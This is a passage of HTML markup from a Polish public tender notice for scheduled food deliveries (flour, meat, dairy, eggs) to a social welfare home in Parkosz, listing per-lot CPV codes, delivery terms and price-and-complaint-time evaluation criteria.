przedmiotu zamówienia: Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia, opisanego szczegółowo formularzu cenowym, stanowiącym załącznik nr 2 do SWZ dot. części od I do VII. Zgodnie z art. 99 ust. 5 Pzp, Zamawiający dopuszcza rozwiązania równoważne opisywanym artykułom: Wykonawca musi wykazać równoważność oferowanego przedmiotu zamówienia poprzez wskazanie w opisie rozwiązania równoważnego na podstawie zawartych w opisie przedmiotu zamówienia kryteriów oceny równoważności (opis oraz minimalny skład zamawianego towaru). Zamawiający dopuszcza zaproponowanie towarów w opakowaniach o innych lecz zbliżonych wielkościach/gramaturach (do +/- 5%) od określonych w Załączniku nr 2 do SWZ parametrów jednostki miary.<br/>Cz. II – Cukier, mąki, kasze: sukcesywna dostawa mąki i kaszy, dwa razy w tygodniu w godzinach od 7:00 do 11:00 zgodnie z zamówieniem Zamawiającego </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15600000-4 - Produkty przemiału ziarna, skrobi i produktów skrobiowych</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Kryterium – Cena brutto (C) – waga 60pkt.<br/><br/>Liczona według wzoru:<br/>C=(CN brutto/CO brutto)x60pkt.<br/>Gdzie: C- Wartość punktowa ceny,<br/> CN brutto – Najniższa oferowana cena brutto,<br/> CO brutto – Cena oferty ocenianej brutto.<br/>2)	Kryterium – Dostawa towaru po uwzględnionej reklamacji (Dr) – waga max. 40pkt. Będzie oceniane na podstawie złożonego oświadczenia w formularzu ofertowym, zgodnie z załącznikiem nr 1 do SWZ. Niezaznaczenie czasu dostawy towaru po uwzględnionej reklamacji, będzie oznaczało przyznanie 0 pkt. Zamawiający będzie oceniał czas dostawy towaru po uwzględnionej reklamacji w następujący sposób:<br/>a)	dostawa towaru w terminie 1 dnia kalendarzowego od daty uwzględnionej reklamacji - 40pkt.<br/>b)	dostawa towaru w terminie 2 dni kalendarzowych od daty uwzględnionej reklamacji - 30pkt.<br/>c)	dostawa towaru w terminie 3 dni kalendarzowych od daty uwzględnionej reklamacji - 20pkt.<br/>d)	dostawa towaru w terminie 4 dni kalendarzowych od daty uwzględnionej reklamacji - 10pkt.<br/>e)	dostawa towaru w terminie powyżej 4 dni kalendarzowych od daty uwzględnionej reklamacji - 0 pkt.<br/><br/>2.	Ocena ofert będzie ostatecznie wyliczana według wzoru: OCENA = C + Dr.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa towaru po uwzględnionej reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 3</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa artykułów spożywczych do Domu Pomocy Społecznej w Parkoszu. <br/>1.1.Przedmiot zamówienia obejmuje sprzedaż wraz z dostarczeniem przez Wykonawcę własnym transportem, artykułów spożywczych do siedziby Zamawiającego, po uprzednim zamówieniu. Zamówienie będzie składane z 1 dniowym wyprzedzeniem przed ustalonym terminem dostawy, mailowo, faksem, telefonicznie lub pisemnie z podaniem ilości oraz rodzaju asortymentu.<br/>1.2.Po dostarczeniu zamówionego towaru Wykonawca jest zobowiązany do rozładowania i wniesienia towaru go do magazynu DPS. Wykonawca zobowiązuje się przekazać towar bezpośrednio osobie uprawnionej do odbioru i kontroli ilościowej i jakościowej. Nie dopuszcza się pozostawiania dostaw przez Wykonawcę osobom nieuprawnionym.<br/>1.3.Koszt transportu i ryzyko ponosi Wykonawca i jest wliczony w cenę zamówienia. <br/>1.4.Dostawa ma odbywać się w godzinach wyznaczanych przez Zamawiającego. Zamówienia będą realizowane sukcesywnie, według potrzeb Zamawiającego. <br/>1.5.Po dokonanym zamówieniu, Wykonawca zobowiązany jest potwierdzić otrzymane zamówienie. <br/>1.6. Zamówiony asortyment musi być najlepszej jakości, wyprodukowany zgodnie z obowiązującymi w tym zakresie normami i przepisami prawa, świeży i nieprzeterminowany. Na każdym opakowaniu powinna znajdować się data minimalnej trwałości lub termin przydatności do spożycia oraz etykieta z występującymi alergenami. Artykuły muszą mieć jak najdłuższy okres przydatności do spożycia. Niedopuszczalne jest dostarczanie towaru z krótką datą przydatności do spożycia, mniej niż 30% czasu licząc od daty produkcji towaru do końcowej daty jego przydatności do spożycia.<br/>1.7.Artykuły spożywcze muszą być składowane i transportowane w sposób zapewniający utrzymanie ich we właściwej jakości handlowej. Artykuły spożywcze muszą być dostarczone przez Wykonawcę transportem, przy zachowaniu odpowiednich warunków higieniczno - sanitarnych, zgodnie z obowiązującymi przepisami prawa, gwarantującymi utrzymanie odpowiedniej temperatury oraz jakości przewożonych artykułów. <br/>1.8.Na każde żądanie Zamawiającego, Wykonawca zobowiązany jest okazać w stosunku do każdego produktu odpowiedni certyfikat zgodności z Polską Normą lub normami europejskim itp. <br/>1.9.Wykonawca zobowiązany jest przestrzegać zalecenia Głównego Inspektora Sanitarnego oraz właściwych ministerstw na czas pandemii COVID-19 w zakresie realizacji przedmiotu zamówienia. <br/>1.10. W przypadku stwierdzenia braków ilościowych w zamówionym towarze, Wykonawca zobowiązuje się uzupełnić towar tego samego dnia dostawy do godz. 1400, bez prawa naliczania jakichkolwiek dodatkowych opłat. Jeżeli brakujący towar nie zostanie dostarczony w tym samym dniu, Wykonawca będzie zobowiązany wystawić fakturę korygującą na wartości dostarczonego towaru. <br/>1.11.W przypadku dostarczenia większej ilości towaru niż zamawiana, Zamawiający ma prawo odmówić przyjęcia nadwyżki oraz domagać się wystawienia faktury korygującej.<br/>1.12.W trakcie realizacji przedmiotu zamówienia Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia zamówienia w zależności od istniejących potrzeb, których aktualnie nie jest w stanie przewidzieć. Poszczególne ilości asortymentów są wielkościami orientacyjnymi. Zwiększenie lub zmniejszenie zakresu ilościowego przedmiotu zamówienia w każdej części może nastąpić maksymalnie o 30% przy czym Wykonawcy nie przysługują w tym zakresie żadne roszczenia wobec Zamawiającego.<br/>1.13.Przedmiot zamówienia jest tożsamy dla wszystkich części z wyłączeniem ust. 2.<br/>2.Szczegółowy opis przedmiotu zamówienia: Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia, opisanego szczegółowo formularzu cenowym, stanowiącym załącznik nr 2 do SWZ dot. części od I do VII. Zgodnie z art. 99 ust. 5 Pzp, Zamawiający dopuszcza rozwiązania równoważne opisywanym artykułom: Wykonawca musi wykazać równoważność oferowanego przedmiotu zamówienia poprzez wskazanie w opisie rozwiązania równoważnego na podstawie zawartych w opisie przedmiotu zamówienia kryteriów oceny równoważności (opis oraz minimalny skład zamawianego towaru). Zamawiający dopuszcza zaproponowanie towarów w opakowaniach o innych lecz zbliżonych wielkościach/gramaturach (do +/- 5%) od określonych w Załączniku nr 2 do SWZ parametrów jednostki miary.<br/>Cz. III – Mięso i wędliny: sukcesywna dostawa mięsa i wędlin, dwa razy w tygodniu w godzinach od 7:00 do 11:00 zgodnie z zamówieniem Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15100000-9 - Produkty zwierzęce, mięso i produkty mięsne</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Kryterium – Cena brutto (C) – waga 60pkt.<br/><br/>Liczona według wzoru:<br/>C=(CN brutto/CO brutto)x60pkt.<br/>Gdzie: C- Wartość punktowa ceny,<br/> CN brutto – Najniższa oferowana cena brutto,<br/> CO brutto – Cena oferty ocenianej brutto.<br/>2)	Kryterium – Dostawa towaru po uwzględnionej reklamacji (Dr) – waga max. 40pkt. Będzie oceniane na podstawie złożonego oświadczenia w formularzu ofertowym, zgodnie z załącznikiem nr 1 do SWZ. Niezaznaczenie czasu dostawy towaru po uwzględnionej reklamacji, będzie oznaczało przyznanie 0 pkt. Zamawiający będzie oceniał czas dostawy towaru po uwzględnionej reklamacji w następujący sposób:<br/>a)	dostawa towaru w terminie 1 dnia kalendarzowego od daty uwzględnionej reklamacji - 40pkt.<br/>b)	dostawa towaru w terminie 2 dni kalendarzowych od daty uwzględnionej reklamacji - 30pkt.<br/>c)	dostawa towaru w terminie 3 dni kalendarzowych od daty uwzględnionej reklamacji - 20pkt.<br/>d)	dostawa towaru w terminie 4 dni kalendarzowych od daty uwzględnionej reklamacji - 10pkt.<br/>e)	dostawa towaru w terminie powyżej 4 dni kalendarzowych od daty uwzględnionej reklamacji - 0 pkt.<br/><br/>2.	Ocena ofert będzie ostatecznie wyliczana według wzoru: OCENA = C + Dr.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa towaru po uwzględnionej reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 4</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa artykułów spożywczych do Domu Pomocy Społecznej w Parkoszu. <br/>1.1.Przedmiot zamówienia obejmuje sprzedaż wraz z dostarczeniem przez Wykonawcę własnym transportem, artykułów spożywczych do siedziby Zamawiającego, po uprzednim zamówieniu. Zamówienie będzie składane z 1 dniowym wyprzedzeniem przed ustalonym terminem dostawy, mailowo, faksem, telefonicznie lub pisemnie z podaniem ilości oraz rodzaju asortymentu.<br/>1.2.Po dostarczeniu zamówionego towaru Wykonawca jest zobowiązany do rozładowania i wniesienia towaru go do magazynu DPS. Wykonawca zobowiązuje się przekazać towar bezpośrednio osobie uprawnionej do odbioru i kontroli ilościowej i jakościowej. Nie dopuszcza się pozostawiania dostaw przez Wykonawcę osobom nieuprawnionym.<br/>1.3.Koszt transportu i ryzyko ponosi Wykonawca i jest wliczony w cenę zamówienia. <br/>1.4.Dostawa ma odbywać się w godzinach wyznaczanych przez Zamawiającego. Zamówienia będą realizowane sukcesywnie, według potrzeb Zamawiającego. <br/>1.5.Po dokonanym zamówieniu, Wykonawca zobowiązany jest potwierdzić otrzymane zamówienie. <br/>1.6. Zamówiony asortyment musi być najlepszej jakości, wyprodukowany zgodnie z obowiązującymi w tym zakresie normami i przepisami prawa, świeży i nieprzeterminowany. Na każdym opakowaniu powinna znajdować się data minimalnej trwałości lub termin przydatności do spożycia oraz etykieta z występującymi alergenami. Artykuły muszą mieć jak najdłuższy okres przydatności do spożycia. Niedopuszczalne jest dostarczanie towaru z krótką datą przydatności do spożycia, mniej niż 30% czasu licząc od daty produkcji towaru do końcowej daty jego przydatności do spożycia.<br/>1.7.Artykuły spożywcze muszą być składowane i transportowane w sposób zapewniający utrzymanie ich we właściwej jakości handlowej. Artykuły spożywcze muszą być dostarczone przez Wykonawcę transportem, przy zachowaniu odpowiednich warunków higieniczno - sanitarnych, zgodnie z obowiązującymi przepisami prawa, gwarantującymi utrzymanie odpowiedniej temperatury oraz jakości przewożonych artykułów. <br/>1.8.Na każde żądanie Zamawiającego, Wykonawca zobowiązany jest okazać w stosunku do każdego produktu odpowiedni certyfikat zgodności z Polską Normą lub normami europejskim itp. <br/>1.9.Wykonawca zobowiązany jest przestrzegać zalecenia Głównego Inspektora Sanitarnego oraz właściwych ministerstw na czas pandemii COVID-19 w zakresie realizacji przedmiotu zamówienia. <br/>1.10. W przypadku stwierdzenia braków ilościowych w zamówionym towarze, Wykonawca zobowiązuje się uzupełnić towar tego samego dnia dostawy do godz. 1400, bez prawa naliczania jakichkolwiek dodatkowych opłat. Jeżeli brakujący towar nie zostanie dostarczony w tym samym dniu, Wykonawca będzie zobowiązany wystawić fakturę korygującą na wartości dostarczonego towaru. <br/>1.11.W przypadku dostarczenia większej ilości towaru niż zamawiana, Zamawiający ma prawo odmówić przyjęcia nadwyżki oraz domagać się wystawienia faktury korygującej.<br/>1.12.W trakcie realizacji przedmiotu zamówienia Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia zamówienia w zależności od istniejących potrzeb, których aktualnie nie jest w stanie przewidzieć. Poszczególne ilości asortymentów są wielkościami orientacyjnymi. Zwiększenie lub zmniejszenie zakresu ilościowego przedmiotu zamówienia w każdej części może nastąpić maksymalnie o 30% przy czym Wykonawcy nie przysługują w tym zakresie żadne roszczenia wobec Zamawiającego.<br/>1.13.Przedmiot zamówienia jest tożsamy dla wszystkich części z wyłączeniem ust. 2.<br/>2.Szczegółowy opis przedmiotu zamówienia: Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia, opisanego szczegółowo formularzu cenowym, stanowiącym załącznik nr 2 do SWZ dot. części od I do VII. Zgodnie z art. 99 ust. 5 Pzp, Zamawiający dopuszcza rozwiązania równoważne opisywanym artykułom: Wykonawca musi wykazać równoważność oferowanego przedmiotu zamówienia poprzez wskazanie w opisie rozwiązania równoważnego na podstawie zawartych w opisie przedmiotu zamówienia kryteriów oceny równoważności (opis oraz minimalny skład zamawianego towaru). Zamawiający dopuszcza zaproponowanie towarów w opakowaniach o innych lecz zbliżonych wielkościach/gramaturach (do +/- 5%) od określonych w Załączniku nr 2 do SWZ parametrów jednostki miary.<br/>Cz. IV – Nabiał: sukcesywna dostawa nabiału, trzy razy w tygodniu w godzinach od 700 do 1100 zgodnie z zamówieniem Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">15500000-3 - Produkty mleczarskie</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Kryterium – Cena brutto (C) – waga 60pkt.<br/><br/>Liczona według wzoru:<br/>C=(CN brutto/CO brutto)x60pkt.<br/>Gdzie: C- Wartość punktowa ceny,<br/> CN brutto – Najniższa oferowana cena brutto,<br/> CO brutto – Cena oferty ocenianej brutto.<br/>2)	Kryterium – Dostawa towaru po uwzględnionej reklamacji (Dr) – waga max. 40pkt. Będzie oceniane na podstawie złożonego oświadczenia w formularzu ofertowym, zgodnie z załącznikiem nr 1 do SWZ. Niezaznaczenie czasu dostawy towaru po uwzględnionej reklamacji, będzie oznaczało przyznanie 0 pkt. Zamawiający będzie oceniał czas dostawy towaru po uwzględnionej reklamacji w następujący sposób:<br/>a)	dostawa towaru w terminie 1 dnia kalendarzowego od daty uwzględnionej reklamacji - 40pkt.<br/>b)	dostawa towaru w terminie 2 dni kalendarzowych od daty uwzględnionej reklamacji - 30pkt.<br/>c)	dostawa towaru w terminie 3 dni kalendarzowych od daty uwzględnionej reklamacji - 20pkt.<br/>d)	dostawa towaru w terminie 4 dni kalendarzowych od daty uwzględnionej reklamacji - 10pkt.<br/>e)	dostawa towaru w terminie powyżej 4 dni kalendarzowych od daty uwzględnionej reklamacji - 0 pkt.<br/><br/>2.	Ocena ofert będzie ostatecznie wyliczana według wzoru: OCENA = C + Dr.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa towaru po uwzględnionej reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 5</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa artykułów spożywczych do Domu Pomocy Społecznej w Parkoszu. <br/>1.1.Przedmiot zamówienia obejmuje sprzedaż wraz z dostarczeniem przez Wykonawcę własnym transportem, artykułów spożywczych do siedziby Zamawiającego, po uprzednim zamówieniu. Zamówienie będzie składane z 1 dniowym wyprzedzeniem przed ustalonym terminem dostawy, mailowo, faksem, telefonicznie lub pisemnie z podaniem ilości oraz rodzaju asortymentu.<br/>1.2.Po dostarczeniu zamówionego towaru Wykonawca jest zobowiązany do rozładowania i wniesienia towaru go do magazynu DPS. Wykonawca zobowiązuje się przekazać towar bezpośrednio osobie uprawnionej do odbioru i kontroli ilościowej i jakościowej. Nie dopuszcza się pozostawiania dostaw przez Wykonawcę osobom nieuprawnionym.<br/>1.3.Koszt transportu i ryzyko ponosi Wykonawca i jest wliczony w cenę zamówienia. <br/>1.4.Dostawa ma odbywać się w godzinach wyznaczanych przez Zamawiającego. Zamówienia będą realizowane sukcesywnie, według potrzeb Zamawiającego. <br/>1.5.Po dokonanym zamówieniu, Wykonawca zobowiązany jest potwierdzić otrzymane zamówienie. <br/>1.6. Zamówiony asortyment musi być najlepszej jakości, wyprodukowany zgodnie z obowiązującymi w tym zakresie normami i przepisami prawa, świeży i nieprzeterminowany. Na każdym opakowaniu powinna znajdować się data minimalnej trwałości lub termin przydatności do spożycia oraz etykieta z występującymi alergenami. Artykuły muszą mieć jak najdłuższy okres przydatności do spożycia. Niedopuszczalne jest dostarczanie towaru z krótką datą przydatności do spożycia, mniej niż 30% czasu licząc od daty produkcji towaru do końcowej daty jego przydatności do spożycia.<br/>1.7.Artykuły spożywcze muszą być składowane i transportowane w sposób zapewniający utrzymanie ich we właściwej jakości handlowej. Artykuły spożywcze muszą być dostarczone przez Wykonawcę transportem, przy zachowaniu odpowiednich warunków higieniczno - sanitarnych, zgodnie z obowiązującymi przepisami prawa, gwarantującymi utrzymanie odpowiedniej temperatury oraz jakości przewożonych artykułów. <br/>1.8.Na każde żądanie Zamawiającego, Wykonawca zobowiązany jest okazać w stosunku do każdego produktu odpowiedni certyfikat zgodności z Polską Normą lub normami europejskim itp. <br/>1.9.Wykonawca zobowiązany jest przestrzegać zalecenia Głównego Inspektora Sanitarnego oraz właściwych ministerstw na czas pandemii COVID-19 w zakresie realizacji przedmiotu zamówienia. <br/>1.10. W przypadku stwierdzenia braków ilościowych w zamówionym towarze, Wykonawca zobowiązuje się uzupełnić towar tego samego dnia dostawy do godz. 1400, bez prawa naliczania jakichkolwiek dodatkowych opłat. Jeżeli brakujący towar nie zostanie dostarczony w tym samym dniu, Wykonawca będzie zobowiązany wystawić fakturę korygującą na wartości dostarczonego towaru. <br/>1.11.W przypadku dostarczenia większej ilości towaru niż zamawiana, Zamawiający ma prawo odmówić przyjęcia nadwyżki oraz domagać się wystawienia faktury korygującej.<br/>1.12.W trakcie realizacji przedmiotu zamówienia Zamawiający zastrzega sobie prawo do zmniejszenia lub zwiększenia zamówienia w zależności od istniejących potrzeb, których aktualnie nie jest w stanie przewidzieć. Poszczególne ilości asortymentów są wielkościami orientacyjnymi. Zwiększenie lub zmniejszenie zakresu ilościowego przedmiotu zamówienia w każdej części może nastąpić maksymalnie o 30% przy czym Wykonawcy nie przysługują w tym zakresie żadne roszczenia wobec Zamawiającego.<br/>1.13.Przedmiot zamówienia jest tożsamy dla wszystkich części z wyłączeniem ust. 2.<br/>2.Szczegółowy opis przedmiotu zamówienia: Wykonawca zobowiązany jest do wykonania przedmiotu zamówienia, opisanego szczegółowo formularzu cenowym, stanowiącym załącznik nr 2 do SWZ dot. części od I do VII. Zgodnie z art. 99 ust. 5 Pzp, Zamawiający dopuszcza rozwiązania równoważne opisywanym artykułom: Wykonawca musi wykazać równoważność oferowanego przedmiotu zamówienia poprzez wskazanie w opisie rozwiązania równoważnego na podstawie zawartych w opisie przedmiotu zamówienia kryteriów oceny równoważności (opis oraz minimalny skład zamawianego towaru). Zamawiający dopuszcza zaproponowanie towarów w opakowaniach o innych lecz zbliżonych wielkościach/gramaturach (do +/- 5%) od określonych w Załączniku nr 2 do SWZ parametrów jednostki miary.<br/>Cz. V – Jaja: sukcesywna dostawa jaj, jeden raz w tygodniu w godzinach od 7:00 do 11:00 zgodnie z zamówieniem Zamawiającego. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">03142500-3 - Jaja</span></h3> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">do 2022-12-31</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert: </h3> <h3 class="mb-0">4.3.1.) Sposób oceny ofert: <span class="normal">Przy wyborze najkorzystniejszej oferty Zamawiający będzie się kierował następującymi kryteriami oceny ofert:<br/>1)	Kryterium – Cena brutto (C) – waga 60pkt.<br/><br/>Liczona według wzoru:<br/>C=(CN brutto/CO brutto)x60pkt.<br/>Gdzie: C- Wartość punktowa ceny,<br/> CN brutto – Najniższa oferowana cena brutto,<br/> CO brutto – Cena oferty ocenianej brutto.<br/>2)	Kryterium – Dostawa towaru po uwzględnionej reklamacji (Dr) – waga max. 40pkt. Będzie oceniane na podstawie złożonego oświadczenia w formularzu ofertowym, zgodnie z załącznikiem nr 1 do SWZ. Niezaznaczenie czasu dostawy towaru po uwzględnionej reklamacji, będzie oznaczało przyznanie 0 pkt. Zamawiający będzie oceniał czas dostawy towaru po uwzględnionej reklamacji w następujący sposób:<br/>a)	dostawa towaru w terminie 1 dnia kalendarzowego od daty uwzględnionej reklamacji - 40pkt.<br/>b)	dostawa towaru w terminie 2 dni kalendarzowych od daty uwzględnionej reklamacji - 30pkt.<br/>c)	dostawa towaru w terminie 3 dni kalendarzowych od daty uwzględnionej reklamacji - 20pkt.<br/>d)	dostawa towaru w terminie 4 dni kalendarzowych od daty uwzględnionej reklamacji - 10pkt.<br/>e)	dostawa towaru w terminie powyżej 4 dni kalendarzowych od daty uwzględnionej reklamacji - 0 pkt.<br/><br/>2.	Ocena ofert będzie ostatecznie wyliczana według wzoru: OCENA = C + Dr.</span></h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal">Punktowo</span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: <span class="normal">serwis posprzedażny, pomoc techniczna, warunki dostawy takich jak termin, sposób lub czas dostawy, oraz okresu realizacji.</span></h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Dostawa towaru po uwzględnionej reklamacji</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">40</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h3 class="p-2 mt-4 bg-light">Część 6</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Dostawa artykułów spożywczych do Domu Pomocy Społecznej w Parkoszu. <br/>1.1.Przedmiot zamówienia obejmuje sprzedaż wraz z dostarczeniem przez Wykonawcę własnym transportem, artykułów spożywczych do siedziby Zamawiającego, po uprzednim zamówieniu. Zamówienie będzie składane z 1 dniowym wyprzedzeniem przed ustalonym terminem dostawy, mailowo, faksem, telefonicznie lub pisemnie z podaniem ilości oraz rodzaju asortymentu.<br/>1.2.Po dostarczeniu zamówionego towaru Wykonawca jest zobowiązany do rozładowania i wniesienia towaru go do magazynu DPS. Wykonawca zobowiązuje się przekazać towar bezpośrednio osobie uprawnionej do odbioru i kontroli ilościowej i jakościowej. Nie dopuszcza się pozostawiania dostaw przez Wykonawcę osobom nieuprawnionym.<br/>1.3.Koszt transportu i ryzyko ponosi Wykonawca i jest wliczony w cenę zamówienia. <br/>1.4.Dostawa ma odbywać się w godzinach wyznaczanych przez Zamawiającego. Zamówienia będą realizowane sukcesywnie, według potrzeb Zamawiającego. <br/>1.5.Po dokonanym zamówieniu, Wykonawca zobowiązany jest potwierdzić otrzymane zamówienie. <br/>1.6. Zamówiony asortyment musi być najlepszej jakości, wyprodukowany zgodnie z obowiązującymi w tym zakresie normami i przepisami prawa, świeży i nieprzeterminowany. Na każdym opakowaniu powinna znajdować się data minimalnej trwałości lub termin przydatności do spożycia oraz etykieta z występującymi alergenami. Artykuły muszą mieć jak najdłuższy okres przydatności do spożycia. Niedopuszczalne jest dostarczanie towaru z krótką datą przydatności do spożycia, mniej niż 30% czasu licząc od daty produkcji towaru do końcowej daty jego przydatności do spożycia.<br/>1.7.Artykuły spożywcze muszą być składowane i transportowane w sposób zapewniający utrzymanie ich we właściwej jakości handlowej. Artykuły spożywcze muszą być dostarczone przez Wykonawcę transportem, przy zachowaniu odpowiednich warunków higieniczno - sanitarnych, zgodnie z obowiązującymi przepisami prawa, gwarantującymi utrzymanie odpowiedniej temperatury oraz jakości przewożonych artykułów. <br/>1.8.Na każde żądanie Zamawiającego, Wykonawca zobowiązany jest okazać w stosunku do każdego produktu odpowiedni certyfikat zgodności z Polską Normą lub normami europejskim itp. <br/>1.9.Wykonawca zobowiązany jest przestrzegać zalecenia Głównego Inspektora Sanitarnego oraz właściwych ministerstw na czas pandemii COVID-19 w zakresie realizacji 